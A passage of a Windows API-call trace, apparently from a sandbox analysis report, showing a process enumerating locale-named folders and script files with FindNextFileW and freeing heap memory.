nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nb-no", cAlternateFileName="")) returned 1 [0174.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.863] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0174.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.863] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0174.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.864] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7eca8e, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7eca8e, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7eca8e, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-br", cAlternateFileName="")) returned 1 [0174.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.865] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0174.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.867] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7eca8e, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7eca8e, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7eca8e, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="root", cAlternateFileName="")) returned 1 [0174.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.867] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0174.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.868] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0174.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.869] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl-si", cAlternateFileName="")) returned 1 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.870] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7c682b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7c682b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7c682b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.870] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sv-se", cAlternateFileName="")) returned 1 [0174.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.870] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee81a6f4, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee81a6f4, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee81a6f4, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0174.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.871] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x4f6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0174.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.871] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7eca8e, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7eca8e, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7eca8e, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0174.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.871] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0174.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.871] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0174.872] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0174.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0174.872] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nls", cAlternateFileName="")) returned 0 [0174.872] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0174.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.872] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee7a05e7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee7a05e7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee7a05e7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dev", cAlternateFileName="")) returned 0 [0174.872] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0174.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.874] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.js", cAlternateFileName="")) returned 1 [0174.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.887] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca-es", cAlternateFileName="")) returned 1 [0174.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.888] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0174.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.889] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da-dk", cAlternateFileName="")) returned 1 [0174.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.889] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de-de", cAlternateFileName="")) returned 1 [0174.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.891] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-ae", cAlternateFileName="")) returned 1 [0174.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.893] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-gb", cAlternateFileName="")) returned 1 [0174.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.893] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-il", cAlternateFileName="")) returned 1 [0174.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.894] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es-es", cAlternateFileName="")) returned 1 [0174.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.896] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu-es", cAlternateFileName="")) returned 1 [0174.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.896] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0174.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.898] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0174.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.899] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.902] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee838f3c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee838f3c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee838f3c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he-il", cAlternateFileName="")) returned 1 [0174.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.902] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0174.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.902] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0174.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.903] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it-it", cAlternateFileName="")) returned 1 [0174.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.905] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0174.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.907] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.909] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee85f17d, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee85f17d, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee85f17d, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nb-no", cAlternateFileName="")) returned 1 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.909] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl-nl", 